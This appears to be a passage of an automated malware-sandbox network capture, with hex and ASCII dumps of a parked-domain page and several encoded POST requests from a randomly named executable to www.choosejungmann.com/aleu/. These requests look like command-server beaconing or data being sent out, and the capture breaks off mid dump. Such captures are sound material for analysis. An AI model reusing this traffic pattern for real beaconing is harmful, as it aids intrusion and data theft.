                                                                                                                                      Data Ascii: <!doctype html><html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="robots" content="noindex, nofollow"> <meta name="viewport" content="width=800, maximum-scale=1"> <meta name="theme-color" content="#005ca3"> <meta itemprop="image" content="https://assets.iv.lt/images/thumbnail.png"> <meta property="og:image" content="https://assets.iv.lt/images/thumbnail.png"> <link rel="icon" sizes="96x96" href="https://assets.iv.lt/images/icon.png"> <link rel="apple-touch-icon" href="https://assets.iv.lt/images/icon.png"> <link rel="stylesheet" type="text/css" href="https://assets.iv.lt/default.css"> <title>maxiwalls.com - Uregistruotas domenas - Interneto vizija</title> </head> <body>... begin header --> <table align=center cellpadding=0 cellspacing=0> <tr> <td> <iframe src="https://assets.iv.lt/header.html" width=768 height=100 scrolling=no frameborder=0></iframe> </td> </tr> <tr><td height=24></td></tr> </table>... end header -->... begin body -->
                                                                                                                                      Apr 17, 2024 08:39:17.389987946 CEST1289INData Raw: 0a 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 37 36 38 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 30 3e 0d 0a 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 3c 74 64 3e 0d 0a
                                                                                                                                      Data Ascii: <table width=768 align=center cellpadding=0 cellspacing=0> <tr> <td> <h1>maxiwalls.com</h1> <p> </td> </tr> <tr valign=top> <td width=508> Domenas <b>maxiwalls.com</b> skmingai uregistruotas
                                                                                                                                      Apr 17, 2024 08:39:17.390005112 CEST1289INData Raw: c4 97 6d c4 97 2c 20 6b 61 64 20 c5 a1 69 61 6e 64 69 65 6e 20 70 61 73 20 6d 75 73 20 73 61 76 6f 20 69 6e 74 65 72 6e 65 74 6f 20 73 76 65 74 61 69 6e 65 73 20 74 61 6c 70 69 6e 61 20 69 72 20 6d 75 6d 69 73 20 70 61 73 69 74 69 6b 69 20 64 61
                                                                                                                                      Data Ascii: m, kad iandien pas mus savo interneto svetaines talpina ir mumis pasitiki daugiausiai alies gyventoj. <p> <table class=table> <tr> <th></th> <th>Patui</th> <th>Svetainei</th> <th>U
                                                                                                                                      Apr 17, 2024 08:39:17.390022039 CEST1289INData Raw: 20 20 3c 74 64 3e 2b 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 3c 74 64 3e 2b 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 3c 74 72 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 20 20 20 20 20 20 20 3c 74 64 20
                                                                                                                                      Data Ascii: <td>+</td> <td>+</td> </tr> <tr align=center> <td align=left>Reseller</td> <td>-</td> <td>-</td> <td>-</td> <td>+</td> </tr> <tr align=center> <td align=left
                                                                                                                                      Apr 17, 2024 08:39:17.390039921 CEST710INData Raw: 6c 69 3e 3c 61 20 74 61 72 67 65 74 3d 5f 74 6f 70 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 76 2e 6c 74 2f 70 72 6f 66 65 73 69 6f 6e 61 6c 75 73 2d 68 6f 73 74 69 6e 67 61 73 2f 22 3e 50 72 6f 66 65 73 69 6f 6e 61 6c 75 73 20
                                                                                                                                      Data Ascii: li><a target=_top href="https://www.iv.lt/profesionalus-hostingas/">Profesionalus hostingas</a> <li><a target=_top href="https://www.iv.lt/vps-serveriai/">Serveri nuoma</a> <li><a target=_top href="https://www.iv.lt/sertifikata


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.44974091.195.240.117802680C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Apr 17, 2024 08:39:34.352952003 CEST748OUTPOST /aleu/ HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: www.choosejungmann.com
                                                                                                                                      Origin: http://www.choosejungmann.com
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Content-Length: 200
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      Connection: close
                                                                                                                                      Referer: http://www.choosejungmann.com/aleu/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                      Data Raw: 51 62 5a 3d 32 75 61 31 75 55 52 32 78 5a 64 6c 62 75 34 5a 68 70 79 4d 39 69 6f 46 61 4b 69 5a 4e 63 50 4f 71 34 30 43 4a 39 72 6c 59 4c 6a 2b 49 4d 4a 62 63 43 6b 73 47 35 72 37 70 37 38 33 39 47 32 6b 61 39 63 33 54 39 78 67 57 47 57 49 4d 41 63 70 64 52 42 47 71 42 63 31 4d 32 55 64 56 53 30 43 6e 42 34 4a 7a 57 63 66 41 6c 50 50 57 38 2b 71 4d 79 4f 51 67 36 6c 77 63 6b 35 32 69 46 42 55 6f 36 48 4e 44 53 59 53 69 34 31 44 75 7a 2f 6f 65 45 48 66 35 41 6a 72 70 47 36 43 45 47 51 72 46 66 67 38 30 64 47 49 4c 4b 4d 6d 4c 74 67 4a 6a 63 53 56 54 4e 36 4f 6c 63 54 79 42 69 59 69 41 41 3d 3d
                                                                                                                                      Data Ascii: QbZ=2ua1uUR2xZdlbu4ZhpyM9ioFaKiZNcPOq40CJ9rlYLj+IMJbcCksG5r7p7839G2ka9c3T9xgWGWIMAcpdRBGqBc1M2UdVS0CnB4JzWcfAlPPW8+qMyOQg6lwck52iFBUo6HNDSYSi41Duz/oeEHf5AjrpG6CEGQrFfg80dGILKMmLtgJjcSVTN6OlcTyBiYiAA==


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      2192.168.2.44974191.195.240.117802680C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Apr 17, 2024 08:39:37.091234922 CEST768OUTPOST /aleu/ HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: www.choosejungmann.com
                                                                                                                                      Origin: http://www.choosejungmann.com
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Content-Length: 220
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      Connection: close
                                                                                                                                      Referer: http://www.choosejungmann.com/aleu/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                      Data Raw: 51 62 5a 3d 32 75 61 31 75 55 52 32 78 5a 64 6c 5a 4e 67 5a 79 2b 75 4d 78 53 6f 43 45 36 69 5a 44 38 50 4b 71 34 34 43 4a 38 75 75 59 35 48 2b 49 75 52 62 64 47 51 73 48 35 72 37 37 62 38 49 6c 6d 32 76 61 39 42 4b 54 2f 6c 67 57 46 71 49 4d 45 55 70 64 6d 64 42 6c 78 63 33 46 57 55 6c 52 53 30 43 6e 42 34 4a 7a 57 49 78 41 6c 48 50 57 4e 4f 71 44 7a 4f 52 70 61 6c 33 55 45 35 32 6d 46 42 51 6f 36 47 69 44 58 34 34 69 39 78 44 75 79 50 6f 65 56 48 59 79 41 6a 70 30 57 37 6c 56 6c 4a 66 64 73 4d 31 39 64 4f 35 45 71 51 4b 44 4c 78 54 79 74 7a 43 42 4e 65 39 34 62 61 47 4d 68 6c 72 62 49 2f 6e 76 6e 74 58 62 55 46 75 58 77 2b 70 77 6c 42 56 35 31 51 3d
                                                                                                                                      Data Ascii: QbZ=2ua1uUR2xZdlZNgZy+uMxSoCE6iZD8PKq44CJ8uuY5H+IuRbdGQsH5r77b8Ilm2va9BKT/lgWFqIMEUpdmdBlxc3FWUlRS0CnB4JzWIxAlHPWNOqDzORpal3UE52mFBQo6GiDX44i9xDuyPoeVHYyAjp0W7lVlJfdsM19dO5EqQKDLxTytzCBNe94baGMhlrbI/nvntXbUFuXw+pwlBV51Q=
                                                                                                                                      Apr 17, 2024 08:39:37.303014040 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                                                      date: Wed, 17 Apr 2024 06:39:37 GMT
                                                                                                                                      content-type: text/html
                                                                                                                                      content-length: 556
                                                                                                                                      server: NginX
                                                                                                                                      connection: close
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      3192.168.2.44974291.195.240.117802680C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Apr 17, 2024 08:39:39.826584101 CEST10850OUTPOST /aleu/ HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: www.choosejungmann.com
                                                                                                                                      Origin: http://www.choosejungmann.com
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      Connection: close
                                                                                                                                      Referer: http://www.choosejungmann.com/aleu/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                      Data Raw: 51 62 5a 3d 32 75 61 31 75 55 52 32 78 5a 64 6c 5a 4e 67 5a 79 2b 75 4d 78 53 6f 43 45 36 69 5a 44 38 50 4b 71 34 34 43 4a 38 75 75 59 35 50 2b 50 64 5a 62 63 6e 51 73 64 35 72 37 67 62 38 7a 6c 6d 32 49 61 39 4a 47 54 2f 35 61 57 41 6d 49 4e 6a 55 70 66 53 70 42 79 42 63 33 49 32 55 65 56 53 30 62 6e 42 49 4e 7a 57 59 78 41 6c 48 50 57 4f 57 71 4b 43 4f 52 76 61 6c 77 63 6b 35 69 69 46 42 34 6f 2b 53 59 44 58 30 43 6a 4f 35 44 74 52 33 6f 64 6e 76 59 74 77 6a 76 33 57 37 39 56 6c 31 41 64 74 68 4d 39 63 4b 66 45 6f 4d 4b 41 76 5a 4c 33 70 44 4f 66 39 65 4f 69 6f 76 6e 46 6a 4e 35 41 66 72 62 67 56 35 34 48 30 64 65 4e 48 44 66 6c 45 74 47 76 6a 64 53 68 39 51 6d 4e 76 6c 66 71 65 67 79 36 63 6d 41 4b 6e 72 51 64 79 46 7a 64 59 4d 78 61 51 51 73 37 75 64 68 49 47 6c 4b 37 4f 61 4d 42 53 39 71 50 59 46 6c 6c 55 44 79 70 6b 46 73 74 54 48 38 35 46 4e 50 6e 4a 65 74 35 71 41 50 30 78 52 4e 38 44 33 47 61 68 4e 32 38 62 34 35 63 46 42 45 34 7a 61 4d 44 63 48 6b 32 6f 76 4a 35 66 32 31 6b 38 72 35 42 55 70 70 71 4c 4b 52 6f 4b 2f 75 70 6d 76 57 4f 2f 63 2f 77 4d 6c 49 2b 65 64 76 32 6e 44 4b 63 55 72 39 63 47 66 35 41 45 33 71 39 65 7a 57 70 35 41 6e 59 50 4f 64 57 54 75 4a 6b 71 7a 47 72 37 41 56 31 74 71 4c 43 56 46 39 54 75 55 45 6b 49 68 79 78 39 6e 2f 66 39 62 68 70 57 45 73 48 47 50 59 79 6a 65 30 6d 75 71 73 68 58 67 78 7a 30 75 78 6f 75 73 43 46 47 55 4a 67 59 4b 57 6c 6b 78 42 61 51 2f 39 77 61 47 69 77 76 38 59 4b 42 75 6e 78 36 49 51 78 37 39 43 37 57 33 78 4c 5a 62 37 2f 59 66 37 6f 4b 57 74 6a 52 6d 6e 35 30 70 6d 4f 51 46 62 33 35 33 6f 5a 6b 78 74 4d 74 43 55 52 77 69 6a 67 65 51 38 35 31 6a 4c 6d 71 55 70 58 6d 70 65 53 39 59 39 39 70 68 63 49 73 64 59 6a 57 4f 77 61 31 67 47 6b 4a 36 37 43 52 53 49 38 79 4f 38 73 6e 67 6e 38 6e 65 45 4b 6b 34 6e 37 6b 30 70 62 68 72 5a 49 4a 37 4a 78 57 56 77 41 41 4d 46 4a 61 63 71 31 53 70 75 34 67 4e 74 5a 30 4f 63 4d 62 63 59 54 71 35 6e 51 30 43 76 6d 79 76 44 43 32 41 66 43 52 64 42 50 77 58 56 6d 57 66 38 65 7a 30 2f 56 70 4c 79 32 71 51 73 41 67 6f 4b 4e 36 6b 6c 69 78 4b 70 68 57 7a 75 4f 32 65 35 4f 74 59 44 58 2b 53 34 79 58 74 46 48 68 48 6a 53 2b 42 55 36 42 69 4c 4d 52 58 38 34 4e 78 48 70 54 32 51 34 73 66 77 37 54 69 76 44 55 57 38 65 33 53 41 6b 63 59 56 66 2b 64 68 68 6f 44 4f 46 58 47 54 66 49 37 56 52 51 4d 47 47 37 36 62 6b 64 4a 53 41 5a 7a 6b 49 6b 6c 77 64 77 31 74 51 72 45 75 75 4f 4d 78 49 49 76 65 4a 65 48 72 55 65 67 36 37 53 6e 79 47 61 68 6e 5a 74 4c 6e 45 41 4a 71 30 4b 69 74 50 5a 79 50 50 6b 62 65 31 78 33 74 4d 54 34 2b 72 55 55 44 4c 7a 50 56 52 39 61 51 54 56 50 65 49 42 37 76 73 6f 4d 6a 61 64 56 48 50 77 54 37 73 37 4e 67 6e 42 33 54 63 46 6c 72 5a 54 63 50 4c 59 62 71 67 72 6c 6d 49 6c 76 76 41 46 62 6d 43 63 34 36 74 64 42 74 32 44 6c 38 6f 39 79 61 76 62 30 49 73 70 6a 31 51 69 73 66 77 68 47 70 52 6d 62 6c 6a 62 6c 31 74 32 61 50 30 52 71 53 75 6b 4b 52 53 32 37 42 58 46 76 47 38 63 35 74 66 74 4c 62 6c 51 6e 53 70 62 79 73 39 45 43 76 45 6d 50 47 44 6f 32 65 74 57 73 32 36 4c 54 4a 69 6e 74 78 52 74 52 2b 38 38 78 64 61 5a 61 38 39 75 33 70 78 6a 73 64 56 46 33 6a 33 53 42 49 2f 30 50 31 65 6e 36 50 62 55 49 6b 4d 49 6b 30 57 4e 53 68 55 55 69 4b 65 6c 4c 52 59 70 77 79 71 75 79 78 34 66 4c 76 76 35 45 52 31 56 70 4d 52 37 45 74 45 4a 33 6a 34 47 4a 54 6f 6a 47 6e 42 30 35 2b 76 57 79 72 62 32 6b 47 75 67 4d 66 6b 52 61 67 34 4c 51 2b 2b 2f 66 65 53 71 73 77 34 56 42 4c 79 6b 44 4f 75 37 77 5a 2f 34 75 58 41 4e 30 30 6c 4f 58 63 39 48 77 55 77 39 32 41 49 68 79 79 70 5a 58 64 73 46 39 6f 76 4c 7a 6b 71 63 4b 59 6b 39 67 30 59 6a 6a 72 38 6c 51 75 78 72 64 6e 68 31 72 41 70 56 5a 63 58 4c 4a 70 53 2b 74 4f 59 49 6a 74 30 72 79 5a 4c 69 51 58 54 48 78 69 38 72 76 64 73 4a 68 52 46 44 6d 41 34 39 53 42 63 56 38 4e 6e 5a 46 43 42 59 4a 42 56 50 57 6c 56 36 64 38 59 79 43 33 70 4e 32 34 54 42 46 53 71 4d 53 63 53 73 42 45 6d 5a 68 71 65 47 75 63 58 59 39 38 37 6c 6e 58 63 49 33 71 4b 7a 74 48 70 64 69 64 68 6c 41 53 44 6b 39 36 4d 62 76 55 56 56 55 38 36 54 4d 71 32 4f 32 34 59 46 33 70 30 50 2f 72 6e 44 73 51 33 58 49 51 48 44 30
                                                                                                                                      Data Ascii: QbZ=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
                                                                                                                                      Apr 17, 2024 08:39:40.038364887 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                                                      date: Wed, 17 Apr 2024 06:39:39 GMT
                                                                                                                                      content-type: text/html
                                                                                                                                      content-length: 556
                                                                                                                                      server: NginX
                                                                                                                                      connection: close
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 